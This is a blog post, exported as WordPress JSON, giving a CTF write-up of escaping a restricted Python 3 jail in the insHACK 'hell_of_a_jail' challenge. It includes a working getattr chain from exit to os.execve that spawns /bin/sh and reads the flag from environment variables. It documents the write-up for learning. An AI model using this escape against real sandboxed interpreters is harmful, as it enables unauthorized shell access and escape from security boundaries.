{"id":146,"date":"2019-05-06T10:00:05","date_gmt":"2019-05-06T10:00:05","guid":{"rendered":"http:\/\/robertmccallum.nl\/?p=146"},"modified":"2019-05-06T10:02:20","modified_gmt":"2019-05-06T10:02:20","slug":"escaping-a-python-jail","status":"publish","type":"post","link":"http:\/\/robertmccallum.nl\/index.php\/2019\/05\/06\/escaping-a-python-jail\/","title":{"rendered":"Escaping a python jail."},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Write up for insHACK hell_of_a_jail challenge.<\/h2>\n\n\n<pre>   ###############################################################\n  #  Challenge\n #  desc:          [ hell_of_a_jail - PWN 150 ]\n#\n#       A guy from FBI found about your Ruby programming activities\n#       and has put you inside a python Jail ! Find your way out !\n#\n ##################################################################\n#:'\n#  Profided is a ssh key, server address and port to connect to.\n#       -p2222  user@hell-of-a-jail.ctf.insecurity-insa.fr\n#\n#  After loggin into te server i got a nice welcome message\n#                     and a python shell.\n#  But not just any shell a shell that would trim off all\n#  input longer than 14 chacters, with only 3 functions to use and\n#  remove all dots and double lower dashes and would spam your sceen\n#  with a thousend times the phrase \"TROLLED !!!!\" if a double quote\n#     occured in the input.\n#   _________________________________________________________________\n#  |To make matters evern worse the challenge was in python3.        |\n#  |Who would spam my screen with messages like,                     |\n#  |Missing parentheses in call to 'print'. Did you mean print(\"A\")? |\n# ,+----------------------------------------------------------------=+\n ###################################################################\n#\n#  To check what fucntions i wase allowed to use out of the box.\n#  I ran this on my local machine copied the output to the server\n#         +---------------------------------+\n#         | &gt;&gt;&gt; for x in dir(__builtins__): |\n#         | ...     print('%s()'%x)         |\n#         +---------------------------------+\n#  Then I scrolled trough the error messages to check what fuctions\n#  were still alive and avalible.\n#  Turns out the only build-in functions I got to play with were:\n#\n#          print(),     exit()    getattr()\n#\n#  the last one I've had never used before but we became good friends\n#                                          during this challenge.\n######################################\n#       [ CUTE NAMED FUNCIONS ]       #\n#                                     #\nG=getattr       # G (fun)  getattr    #  Because of de 15 chacter\nP=print         # P (fun)  print      #  I decided to rename them\nE=exit          # E (fun)  exit       #  to something shorter.\n#                                     #  as I also had to do with\n#######################################  most of the stings.\n#              SOME USEFULL STRINGS   #\nu='_'+'_'       # u (str)  __         #    While trying to explore the\nc=u+'class'+u   # c (str)  __class__  #  possiabilities (or lack here of)\ncc=u+'call'+u   #cc (str)  __call__   #  I realized soon enough that\ncd=u+'code'+u   #cd (str)  __code__   #  the time out on the sever was\nd=u+'dir'+u     # d (str)  __dir__    #   annoyingly short, it\ndd=u+'doc'+u    #dd (str)  __doc__    #   also did't auto complete\nb=u+'bases'+u   # b (str)  __bases__  #   on tab and was printing\ns=u+'subclas'\\  # s (str)  __subclasses__   esc codes instead of moving\n 'ses'+u                              #   my cursur back.\nss='self'       #ss (str)  self       #   I quickly moved to worinking\nh='\/bin\/sh'     #h  (str)  \/bin\/sh    #   in this script instead.\nf='.\/flag.txt'  # f (str)  .\/flag.txt #\nff=u+'file'+u   #ff (srt)  __file__   #   this would also allow me to\nfg=u+'flags'+u  #fg (str)  __flags__  #   neatly organize my collection\no='open'        # o (str)  open       #     of usefull strings.\nr='read'        # r (str)  read       #      'n other things.\ne='execve'      # e (str)  execve     #   my initinal tought was to\nm=u+'mro'+u     # m (str)  __mro__    #  create something simulair to:\nn=u+'name'+u    # n (str)  __name__   #  ().__class__.__bases__[0].__subclasses__()[40](\".\/key\").read()\na='append'      # a (str)  append     #  wich I've seen and even used\ng=u+'globals'\\  # g (str)   __globals__  before. but i never fully\n ''+u                                 #  understood what was going on\nl=u+'locals'+u  # l (str)  __locals__ #  after a lot of time READING\nv='co_varnam'\\  # v (str)  co_varnames#    python documentation.\n 'es'                                 #  I realized the fucntions\nen='environ'    #en (str)  environ    #  that i wanted to use were.\n#------------------------------------ #  removed from __subclasses__\n#  I spend a lot of time browsing around this python class space\n#  reading writeups and documentation trying to figure out how to\n#  defeat this beast. I READ about how to use getattr to access atribute\n#  form objects, I READ even more about this strange object oriented\n#  world named python and exlporing with __mro__ __subclasses__ and __dir__\n#  But what I should have READ a little bit better was .\n#  !!!!! THE welcome MESSAGE comming FROM the SERVER. !!!!!!!!\n#  There was a big BIG big hint in there pointing towards the exit()\n#  It was only when I was rearanging my terminal windows, and closing\n#  the billion python documentation tabs in my browser. when I\n#  accsendently opened the ssh connection and wanted to close it with\n#  CTRL+D, but that din't work because quit() wasn't there so I typed\n#  exit() and I got promted with a error telling me that exit() requires 1\n#  argument... And then my eye caught the Welcome message.\n#  +------------------------------------------------------+\n#  [Oh my jail ! You need to exit() with the correct key. ]\n#  [It might make you free (and give you the flag)        ]\n#  +------------------------------------------------------+\n#  After I saw this I know I was looking in the wrong places.\n#  and I focused my attention to the object named quit.\n#  Whom was holding a lot of goodies like __globals__\n#  With a os object.\n#\n#  So I Quickly build a OBJchain.(Tm) and ran to the nearist exit.\n#  (what for me was '\/bin\/sh' I had everything already prepaired\n#  and ready to open a file or pop a shell.)\n#\n###########################################################\n#             [VERY USEFULL THINGEMAGADGETS]\nC=G(E,c)       # C (Obj)  exit.__class__\nB=G(C,b)       # B (Obj)  exit.__class__.__bases__\nD=G(C,d)       # D (Fun)  exit.__class__.__dir__\nS=G(B[0],s)    # S (Obj)  exit.__class__.__bases__[0].__subclasses__\nM=G(C,m)       # M (Obj)  exit.__class__.__mro__\nX=G(E,g)       # X (Dic)  exit.__globals__\nO=X['os']      # O (Obj)  exit.__globals__[os]\nY=G(O,en)      # Y (Dic)  exit.__globals__[os].environ\nF=G(O,e)       # F (Obj)  exit.__globals__[os].execve\nF(h,[h],Y)     #          exit.__globals__[os].execve('\/bin\/sh',['\/bin\/sh'],os.environ)\n#\n########################################################\n#\n#  So after popping the shell I was a bit confused about the\n#  absence of the flag.txt I was craving for for all these hours.\n#  The only thing besides me in the path I ended up in was jail.pyc\n#  but I rememberd the welcome message said something about keys and exits.\n#  so I check it for strings. hoping it would hold a flag.\n#  wich it din't. So I wrapped it in some base64 and copied it to my local\n#  machine to decompile.\n#\n#  +----------------------------------------------------------------------+\n#  |def exit(arg):                                                        |\n#  |    \"\"\"Must invoke with the right arg in order to get the flag.\"\"\"    |\n#  |    if arg == os.environ['0f4d0db3668dd58cabb9eb409657eaa8']:         |\n#  |        print('Oh no ! You managed to escape\\nValidate with the key') |\n#  |       return sys.exit(0)                                             |\n#  |   print('Wrong key')                                                 |\n#  +----------------------------------------------------------------------+\n#                                                                         #\n#  So yeah.. . . The flag was hiding in environment variables\n#  INSA{688a3188bcd888ad4540da2ac73c94ae9f55ded00ed1742c4388bb7c3285acd2} #\n#   I had a lot of fun and learned a lot during this challenge.         #\n #    Shout out tO My team Mates.                                    #\n  #                                  -xXx-    TNX FOR READING...  #\n   #\n     #####M42D##################'''''''''''''''''''''''''''''''\n<\/pre>","protected":false},"excerpt":{"rendered":"<p>Write up for insHACK hell_of_a_jail challenge. ############################################################### # Challenge # desc: [ hell_of_a_jail &#8211; PWN 150 ] # # A guy from FBI found about your Ruby programming activities # and has put you inside a python Jail ! Find your way out ! # ################################################################## #:&#8217; # Profided is a ssh key, server address &hellip; <a href=\"http:\/\/robertmccallum.nl\/index.php\/2019\/05\/06\/escaping-a-python-jail\/\" class=\"more-link\">Lees <span class=\"screen-reader-text\">&#8220;Escaping a python jail.&#8221;<\/span> verder<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-146","post","type-post","status-publish","format-standard","hentry","category-geen-categorie"],"_links":{"self":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/comments?post=146"}],"version-history":[{"count":4,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions"}],"predecessor-version":[{"id":150,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/posts\/146\/revisions\/150"}],"wp:attachment":[{"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/media?parent=146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/categories?post=146"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/robertmccallum.nl\/index.php\/wp-json\/wp\/v2\/tags?post=146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}